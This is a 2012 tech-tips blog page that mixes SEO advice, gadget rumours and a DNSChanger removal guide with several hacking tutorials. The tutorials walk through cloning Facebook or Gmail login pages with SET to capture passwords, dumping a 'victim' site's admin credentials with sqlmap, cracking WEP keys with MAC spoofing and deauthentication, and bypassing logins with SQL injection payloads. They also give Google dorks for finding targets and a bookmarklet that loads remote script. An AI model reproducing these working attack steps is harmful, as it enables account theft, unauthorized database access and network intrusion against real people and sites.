Pages

Friday, August 3, 2012

Increase Traffic From Mobile on Your Website

Are You want to get traffic from mobile (Mobile Visitor) on your website.
This will really helpful to increase the number of mobile visitors of your blog. Just follow the tutorial below:-
  • Login to your blogger Templates- -> Edit HTML--> Proceed (New interface)
  • Scroll down to where you see this code
  • Now copy below code and paste it before that code:-



< content='width=device-width,minimum-scale=1.0,maximum-scale=1.0' name='viewport'/>;
<:else/>
< content='width=1100' name='viewport'/>
  • Save your edit and you done...

Get More Backlinks on Websites


Backlinks are Google's most important ranking factor. The better the backlinks are, the higher it will rank on Google.
SEOprofiler offers several great link building tools:

Get more backlinks using seoprofiler

  • Improve the existing backlinks of your site
The fastest way to improve the backlink structure of your website is to improve the existing backlinks of your site. The "Current Links Optimizer" tool in SEOprofiler helps you to do this as quickly and efficiently as possible.

  • Benefit from the backlinks of your competitors
Websites that link to your competitors are websites that could also link to your site. The "Backlinks By Competitor" tool shows you the websites that are likely to link to your site.
You get easy link targets, the links with the highest influence and the most important links of your competitors.

  • Get backlinks that contain the right anchor text
If you want to get high rankings for a particular keyword, you need many backlinks that contain the keyword in the anchor text. The "Get New Backlinks By Keyword" tool shows you which web pages are willing to link to other sites with your keywords.

  • Find hub sites that put your website into the right context
Use the "Hub Finder" tool to find websites that link to at least two of your competitors. It is very likely that websites that link to more than one of your competitors will also link to your site.

  • Manage your backlinks with the easy-to-use backlink manager
Use the backlink manager in SEOprofiler to keep track of your link building activities. The link manager is integrated with all link building tools in SEOprofiler and it offers many powerful features that make it as easy and efficient as possible to get new links.

For example, you get detailed contact information for any website, you see the status of each backlink and much more. You can also add pages while surfing the web.

Tuesday, July 31, 2012

Hack facebook and Gmail using Backtrack 5

I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set
Backtrack5 1

Now Open social Engineering Tool kit (SET) ./set
backtrack5 2

Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)
backtrack5 3

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER
backtrack5 4

Then select 2nd option “Site Cloner” and Hit ENTER
backtrack5 5

Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)
backtrtack5 6

Now just hit the enter.
backtrack5 6

Open new terminal and just type ifconfig and hit ENTER
backtrack5 9

Now just copy this IP address and open it in Browser.
backtrack5 7

Now here I am just typing test email and password to see whether it works or not.
backtrack5 8

Now just hit enter and switch back to our terminal and we found the Email and password !
backtrack5 10

This tutorial is just educational purpose only.

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat is not a fully automated tool, the ones we call – “one click ownage“. You are the driving force behind this tool. Once, you understand how this tool works, you will be able to exploit a lot more difficult SQL injections easily. Consider this tool as an automation tool/front-end for manual blind SQL injections.





Hack website using Backtrack

I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs


4. Now you will get the database name of the website

sql map 3

Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables


6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4

7. Now you will get the tables list which is stored in aj database.
sql map 5

8. Now lets grab the columns from the admin table

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

sql map 7

Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !
sql map 9

How to crack WEP with BackTrack 5

1.) Start monitor mode:

airmon-ng

Copy down interface

airmon-ng start (interface)

If it says "mon0" or"wifi0" is used, this is your new interface

If it says other things are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your targets BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This lets you test specifically, can beuseful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface(s)

ifconfig (interface) down

macchanger--mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating client’s MACs under Station

If found & step 6 isn’t going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

7.) ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

Minimum around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit

Try "aircrack-ng -n 64 (dump-name)*cap"every 10,000 IVs

If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

If key bytes are all numbers, try running with "-t" to assume an all numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

Retry with the fudge factor increased by4 more if that’s unsuccessful

If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes

* Other attack methods:

Injection attack with 2 wireless cards:

aireplay -9 -i (receiving interface) (injecting interface)

If fails on Attack -5, make sure the injection interface MAC matches the current card MAC

Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online

This will disconnect the authenticated client, so they may be suspect...

Thursday, May 17, 2012

Add all your facebook friends to a group in one click.

Now you can add all your facebook friends to a group by
preparing a script using following method.All it needs is group id & a web hosting site which u registered in.

Step1:Find group id.

'10736816604104' this is the group id in above link.If the group id is not in numerical form open group,right click on report group & open link in new tab. 

 

Here u can see the group id which is equal to cid '10736816604104' which is numerical.

This group id number will be used in script.

Step 2: Download sample script & edit.


download the script,open in notepad & find the value '10736816604104' and replace it with the group id which u want to add & save the file.

step 3: Upload file in a web hosting site.


Use any web hosting site to upload script & execute.I use http://www.my3gb.com/ after upload a link is created for the file.
 
Example: http://hnk007.my3gb.com/file1.txt

step 4: Use script.
the created link should place in the following script at src='http://techtipsandtricks.my3gb.com/file1.txt'.

javascript:(function(){document.body.appendChild(document.createElement('script')).src='
http://hnk007.my3gb.com/file1.txt';})();

now copy above script,open group and enter in address bar(Only mozilla firefox browser) and all your friends will be added & shows number of frnds added to group.


In other browsers including firefox create new bookmark with script in location.After creating bookmark open the group & click the bookmark which has the script of that group.Wait few seconds This will start adding your friends in that Group.

SQL injection bypass the login form

In this tutorial I will be explaining What is SQL(Its structure), what is SQL injection? how to perform the attack? and how to make your website safe from such kinds of attacks. Before you read any article on sql injection I recommend you to read this first. In this tutorial I will be using MySQL and PHP. I have chosen PHP since it is most widely used language and and in most of the cases MySQL is used as database with PHP. PHP is a web scripting language like ASP, JSP, CGI....You need not learn this attack in every language, the concept of attack remains same for all the languages.

Basics of SQL:
The structure of SQL is divided into:
SQL server-> Databases->Tables-> Columns and Rows.
Sql server: is an application which runs on server side of the application and serves the request as per the command given in client side.
Database: This is a kind of container where particular applications related tables are kept.
Tables: It stores the data in the form of rows and columns.

SQL Injection: Introduction

It is the most widely used technique of hacking since most of the websites today maintain database. SQL Injection is a code(sql) injection technique because of the improper filtration of users input. Lets see a basic injection attack:


Bypassing the login form:
Lets consider a login form login.php

if (isset($_POST['submit']))
{
$username=$_POST['username'];
$password=$_POST['pass']
$check=mysql_query("SELECT * FROM member WHERE username = ' $username' and password=$password");
$check2 = mysql_num_rows($check);

if ($check2 == 0)
     echo "login failed";
else
header("location: members.php);
}
else
{
<form action="login.php" method="post" name="login"> 
<h1>USERLOGIN</h1><br/>
Username:<input type="text" name="username"> 
<br/><br/>
Password:
<input type="password" name="pass"<input type="submit" name="submit" value="Login"> </form> 


This is not the exact login form just to give you a feel how exactly login form works i have written this code. Just focus on the dark shaded portions of the code, as you can see the login details is sent via "post" method as soon as the submit button is clicked, after clicking the submit button the PHP code will run as "isset" condition is true. Now lets see what happens in the background, the select function tries to fetch the details from the "member" table by comparing the username and password sent from to the username and password inside the member table. Clearly the code which I have written is vulnerable, lets see how?
Consider a situation I have given input something like below:
Username: ' or 'a'='a'
Password: ' or 'a'='a'
Now lets see what happens in the background i.e. in select staement:
select * from member where username=' ' or 'a'='a' and password=' ' or 'a'='a'
Now if you see carefully the two shaded portions, they both results "true". That means our username and password is accepted.
Some other username and password combination which can come handy for SQL injection:


Username: ' or 'a'=a');--
Password: anything



Username: ' or 'a'=a';--
Password: anything

select * from member where username=' ' or 'a'='a');-- and password=' ' or '1'='1'
the command after "--" will act as comment.


Bypassing admin login form. In most of the cases the cases the username for administrator field is "admin" which can be useful when we are injecting code. Lets see:
Username: admin;--
Password: anything



Username: admin);--
Password: anything


Now consider a situation where you know the username and few letters of password, in such cases you can try the following:


Username:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='
password:' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='


We can use google dorks to find login page:
Example type: inurl:login or inurl:login.php or inurl:adminlogin or intitle:login in Google search box.

Note: It is not necessary that these combinations will always work. It will depend on the way the script engine is programmed.

Anonymous operating system

More than 26,000 people have downloaded an operating system which members of the Anonymous hacker group claim to have created.

The software is based on a version of the open-source operating system Linux and comes outfitted with lots of website sniffing and security tools.

The "official" Anonymous group has distanced itself from the software.

In a widely circulated tweet, Anon-ops claimed the operating system was riddled with viruses.

Tool box

The operating system is available via the Source Forge website - a well-known repository for many custom code projects.

The 1.5GB download is based on Ubuntu - one of the most popular versions of the Linux operating system. The software's creators say they put it together for "education purposes to checking the security of web pages (sic)".

It asked people not to use it to destroy webpages.

Soon after the operating system became available, the Anon-ops account on Twitter posted a message saying it was fake and "wrapped in Trojans".

The creators of the OS denied it was infected with viruses adding that, in the world of open-source software, "there were no viruses".

Code check

After downloading and running the software, Rik Ferguson, director of Trend Micro's European security research efforts, said it was "a functional OS with a bunch of pre-installed tools that can be used for things like looking for [database] vulnerabilities or password cracking".

It also included tools such as Tor that can mask a person's online activities. In many ways, he said, it was a pale imitation of a version of Linux known as Back Track that also comes with many security tools already installed.

Mr Ferguson said he was starting work to find out if there were any viruses or booby-traps buried in the code.

Graham Cluley, senior researcher at hi-tech security firm Sophos, wondered who would be tempted to use it.

"Who would want to put their trust in a piece of unknown software written by unknown people on a webpage that they don't know is safe or not?" he asked.
He warned people to be very wary, adding that some hacktivists keen to support the work of Anonymous had been tricked earlier in the year into installing a booby-trapped attack tool.

"Folks would be wise to be very cautious," he said.

How To Protect Yourself From DNSChanger

DNS Changer

In July the Internet Systems Consortium will permanently shut down DNS servers deployed to serve as temporary surrogates for rogue DNS servers shut down as part of Operation Ghost Click, an FBI operation that brought down an Estonian hacker ring last year. If your PC is one of the more than 1 million computers infected that carry DNSChanger you might unknowingly be relying on one of the FBI's temporary servers to access the Internet, and if you don't eliminate DNSChanger from your PC before the FBI pulls the plug on its servers, you'll be left without Internet access. Read on to learn how to discover whether you're infected with DNSChanger, and what you can do to eliminate it from your system.

How to Tell Whether DNSChanger Has Infected Your PC

To figure out whether you've been infected with DNSChanger, just point your Web browser to one of the (admittedly amateur-looking) DNSChanger Check-Up websites that Internet security organizations maintain across the globe. The link above will take you to a DNS Changer Check-Up page in the United States that the DNS Changer Working Group maintains; if you live outside the United States, you can consult the FBI's list of DNSChanger Check-Up websites to find an appropriate service for your region.

Unfortunately, if your router is infected, those websites will think that your PC is infected, even though it may be clean; worse, if your ISP redirects DNS traffic, your PC may appear to be clean even though your DNS settings may have been maliciously altered. If you want to be certain that your PC is free of DNSChanger malware, you need to manually look up the IP addresses of the DNS servers that your PC contacts to resolve domain names when browsing the Web.

To look up which DNS servers your Windows 7 PC is using, open your Start menu and either run the Command Prompt application or type cmd in the Search field. Once you have a command prompt open, type ipconfig /allcompartments /all at the command line and press Enter. A big block of text should appear; scroll through it until you see a line that says 'DNS Servers', and copy down the string(s) of numbers that follow (there may be more than one string here, meaning that your PC accesses more than one DNS server).

It's even easier for Mac OS X users to determine the IP addresses of the DNS servers that their PC uses. Open the Apple menu (usually located in the upper-left corner of the screen) and select System Preferences. Next, click the Network icon to open your Network Settings menu; navigate to Advanced Settings, and copy down the string(s) of numbers listed in the DNS Server box.

DNS Changer

Once you know the IP addresses of the DNS servers that your PC is using, head over to the FBI DNSChanger website and enter those addresses into the search box. Press the big blue Check Your DNS button, and the FBI's software will tell you whether your PC is using rogue DNS servers to access the Internet.
What to Do If Your PC Is Infected by DNSChanger

If your PC is infected with DNSChanger, you'll have to do some intensive work to get rid of it. DNSChanger is a powerful rootkit that does more than just alter DNS settings; if you've been infected with DNSChanger, your safest course is to back up your important data, reformat your hard drive(s), and reinstall your operating system.

If you're leery of reformatting your entire PC, you can try rooting out the DNSChanger rootkit with a free rootkit removal utility such as Kaspersky Labs' TDSSKiller. As the name implies, Kaspersky released the program to help PC owners seek and destroy the TDSS rootkit malware, but it also detects and attempts to eliminate DNSChanger and many other forms of rootkits.

If the infected PC is on a network, you'll have to check every other PC on the network for signs of infection, and then check your router's settings to ensure that it isn't affected (DNSChanger is programmed to change router DNS settings automatically, using the default usernames and passwords of most modern routers). To do this, copy down your router's DNS server IP addresses (located in your router's settings menu) and check them against the FBI's IP address database mentioned above. If your router is infected, reset the router and confirm that all network settings are restored to the manufacturer's defaults.

When you're done, repeat the steps outlined above to verify that your PC is no longer infected with DNSChanger. With all traces of this vicious malware eliminated, you should have nothing to fear when the FBI shuts down the ISC's temporary DNS servers in July.

Windows 8 Beta Download (Consumer Preview)

windows-8.png
Windows 8 is the official name for the next version of Microsoft Windows, a series of operating systems produced by Microsoft for use on personal computers, including home and business desktops, laptops, net-books, tablet PCs, and media center PCs. According to unofficial sources, the release date for Windows 8 has been set for October 2012, three years after the release of its predecessor, Windows 7. Windows 8's server counterpart, Windows Server 2012, is in development concurrently with Windows 8. The most recent officially released pre-release version is the Consumer Preview, which was released on February 29, 2012. An almost-complete Release Preview is scheduled for June 5, 2012.

Unlike Windows 7, which was intended to be a more focused, incremental upgrade to the Windows line, Windows 8 has been “re-imagined from the chip-set to the user experience” to connect more with the user. It features the Metro interface that is designed for touchscreen input similar to that in Windows Phone and on the Xbox 360. A version of Windows 8, called Windows RT, also adds support for the ARM processor architecture in addition to the previously supported microprocessors from Intel and AMD.

Downloading Windows 8 Beta

Windows setup (with tools to create an ISO or thumb drive)

http://windows.microsoft.com/en-US/windows-8/download

ISO image (use Disk Image burner or USB tool)

http://windows.microsoft.com/en-US/windows-8/iso


Tuesday, May 15, 2012

Keyboard Dancing Led Light Trick

               
 Today i am going to show you an interesting trick which will let your keyboard led light to dance. Basically we will be creating a vb-script to make caps lock, num lock and scroll lock to perform this trick. So lets get started.

     How to do that ?
       1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
        2. Then save this file as led.vbs (.vbs is must)
       3. Open your save file and see your keyboard led blinking like disco lights.


     How to disable blinking Led ?
       1. First open Task Manager [ctrl+alt+del ]
       2. Then Go to process tab.
       3. Select wscript.exe 
       4. Click on End process.

Google would develop its own processors for their Android devices


Surprising rumor that jumped on the net today. It is said that Google may be developing its own processor and GPU to be used in future Android devices and thus have the search company more control over the hardware.
It seems that Google wants to have hardware with a longer life cycle than usual to not depend on third parties for the development and future of Android, and be Google which also mark the evolution of hardware Apple makes designing their processors ARM for their IOS devices.
No more details are known but this rumor that Google might try to design a processor and GPU free with the minimum requirements to run Google Android and forces developers to optimize applications and games on that processor created by Google for avoid the fragmentation that is occurring now in the processors .
The first device that could make use of processor is Google's brand could be the Nexus that would leave at the end of 2012, which could also be manufactured by Motorola to be now owned by Google and offer a mobile first 100% designed by Google.

Wednesday, May 9, 2012

Read and write Indian languages in your Android phone

we know that android is not an Indian developed software hence as usual it will not support Indian languages in almost all phones. But you know we Indians are intelligent enough to do it our self. Here i will tell you how to install and read Indian languages like Gujarati,Hindi,Kannada,Telugu in your android phone.
 
Only you have to do is to copy the .ttf font of your choice to the system/font directory.
But it is not so easy because android will not allow you to access your phones root directory.

But we can do that by the method called ROOTING....!!!!!!!!!!!!!!!
For more Information...
http://www.tech-inside.in/p/android-tricks.html

It is a easy process and at the same time its risk based to it may format or stops your phone


Here is what you have to do

1. Enable USB debugging on your phone by going to Settings –> Applications –> Development. Check the ‘USB Debugging’ option.


2. Make sure you have a SD card inserted and mounted in your phone

3. Download the GingerBreak APPLICATION FROM "" XDA Developers "" and get it onto your phone.

4. Install it by browsing to the GingerBreak APK From your file manager

5. Open GingerBreak application from your menu press the root button.Wait for a few minutes. If there are no problems, the device will reboot itself. (The reboot will take quite some time.)You will see a SuperUser app location along with your system applications after the reboot. Open it and see if it is working.


That's it you have rooted your phone.


INSTALL INDIAN FONTS

  1. Download the font you want of any  language (file type: ttf) from the market or from internet.
  2. Go to android market from your phone and search and install "font changer" after installing font changer open it
  3. It will show that BUSY BOX IS NOT INSTALLED IN YOUR PHONE DO YOU WANT TO DOWNLOAD IT FROM MARKET" PRESS OK AND INSTALL IT (while installing it may say that busy box is already installed in your phone and some .... don't mind it )
  4. Now open font changer and go to options->settings->fonts location and give your font location if it in download folder of sd card give it as /sd card/downloads
  5. Now you can see your font in font changer press on it and apply.
  6. It will ask to reboot press OK
  7. Now it will display all fonts includes English
  8. You can read Gujarati,HIndi,etc news papers from your default browser
  9. Now you can read all websites which is in Gujarati,Hindi languages.

     HERE IS SOME SCREEN SHOTS        

     

                                           
    

Tuesday, May 8, 2012

Android's Update to 5.0 (Jelly Bean)

                   
 When most of us are still waiting for our devices to upgrade to the latest version of Android 4.0 (Ice Cream Sandwich) the next version of Google's operating system. But now there are some rumors, That Next version now known as Android 5.0 (Jelly Bean) would be released during the next 4 months of this year and the new version could be expected to be used officially in tabs(notebooks), supporting high end screen resolutions.

Android 5.0 (Jelly Bean) would have support for dual boot with Chrome OS for devices to have both these two operating systems on Google. This would be good for laptops, where would a normal Android operating system and then a quick start with Chrome OS for browsing only.

Android Hub, the music box from Google



A few days ago I talked about Augmented Reality glasses being developed by Google , we bring you today is also interested in creating an entertainment system for listening to music wirelessly.
The news uncovers the Wall Street Journal, and ensures that the device will be released under the Google brand . It is not known the name of the device, but some sources suggest that will be calledAndroid Hub , and will be in the market later this year.
No further details on the apparatus, we can only guess that Android will be some version of the OS, andGoogle Music (or similar services appear based on the cloud) the department responsible for bringing music to the mysterious black box, one source suggests that speakers have .
Others are speculating that it would be a set top box , without speakers, that would have WiFi connectivity, hardware based on ARM , and a price not exceeding $ 100. Perhaps governed by an operating system of Google TV evolution , would forget the name of one more tug and Android Hub.In this case you will be talking about more than just a device to play music wirelessly.
Finally, it is also spoken tablets and Android smartphones would be the controls of the device, and to share content with it.
We have no waiting for more complete information or leaks, and if you consider it appropriate to share with us what you would like. Surely in the upcoming Google I / O , 27 to June 29, we learn more.
Last year was the Google I / O a demonstration of Tungsten Project, which could be related to the mysterious device discussed in the news (46:45 minutes):

NOKIA Mobile Hidden Code List



On the main screen on your Nokia Made mobile phone type in:
  1. *#06# for checking the IMEI (International Mobile Equipment Identity). 
  2. *#7780# reset to factory settings. 
  3. *#67705646# This will clear the LCD display(operator logo). 
  4. *#0000# To view software version. 
  5. *#2820# To show Bluetooth device address. 
  6. *#746025625# Sim clock allowed status. 
  7. #pw+1234567890+1# Shows if sim have restrictions. 
  8. *#92702689# takes you to a secret menu where you may find some of the information below: 
  9. Displays Serial Number.
  10. Displays the Month and Year of Manufacture
  11. Displays (if there) the date where the phone was purchased (MMYY)
  12. Displays the date of the last repair – if found (0000)
  13. Shows life timer of phone (time passes since last start) 
  14. *#3370# Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though. 
  15. *#3370* (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network. 
  16. *#4720# Half Rate Codec activation. 
  17. *#4720* Half Rate Codec deactivation. The phone will automatically restart
  18. If you forgot wallet code for Nokia S60 phone, use this code reset:*#7370925538#
  19. Press *#3925538# to delete the contents and code of wallet. 
  20. Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \ 
  21. *#7328748263373738# resets security code.
Note:- your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345.
Default security code is 12345

Related Posts Plugin for WordPress, Blogger...